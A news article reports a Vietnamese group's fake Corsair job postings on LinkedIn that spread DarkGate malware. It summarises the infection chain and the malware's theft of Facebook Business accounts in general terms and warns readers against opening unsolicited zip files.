You can never be too careful when surfing the web, even if you’re looking for a new job. Corsair is a prominent name in the gaming hardware and accessories market, and it stands to reason that it would be a hot destination for enthusiasts in the market for a new job. However, some nefarious parties are using Corsair’s name to spread DarkGate malware to unsuspecting job seekers’ computers.
Bleeping Computer first noticed the report involving perpetrators from a Vietnamese cybercriminal ring using fake LinkedIn posts and direct messages to users about a job opening at Corsair. The phony content implies that Corsair is hiring a Facebook Ads specialist and targets LinkedIn users based in the United States, United Kingdom, and India.
The LinkedIn posts and direct messages contain a link to a suspicious URL which is designed to appear as if it goes to Corsair, but does not. As if that URL isn’t suspicious enough, the link directs unsuspecting job applicants to a zip file (hosted by Dropbox or Google Drive) entitled “Salary and new products.8.2.1.zip.” Contained within the zip file are the following files:
- Job Description of Corsair.docx
- Salary and new products.txt
- PDF Salary and Products.pdf
According to WithSecure, the archive contains a VBS script that copies the Windows binary curl.exe to a different location and then renames it. The renamed file connects to an external site and downloads autoit3.exe and the autoit3 script. The executed script then manifests the DarkGate malware designed to extract sensitive information from its targets. The malware then tries to uninstall anti-malware software installed on a system, although WithSecure says that its software, along with Sophos and Forcepoint, thwarted those attempts.
DarkGate is related to previously identified Ducktail malware, which steals credentials/cookies and relays them to the bad actors. However, DarkGate has a more specialized component that targets Facebook Business accounts. “If it locates a Facebook Business account session cookie, it will attempt to add the attacker to the account as an administrator,” writes the security researchers at WithSecure. “[It] even has functionality to automatically create and publish fraudulent ad campaigns sent by the actor to the compromised device.”
We advise everyone to remain vigilant when dealing with unfamiliar or suspicious-looking posts and direct messages. And please, don’t go around haphazardly downloading and opening zip files, as you can’t always depend on your antivirus program to save your skin in every case.
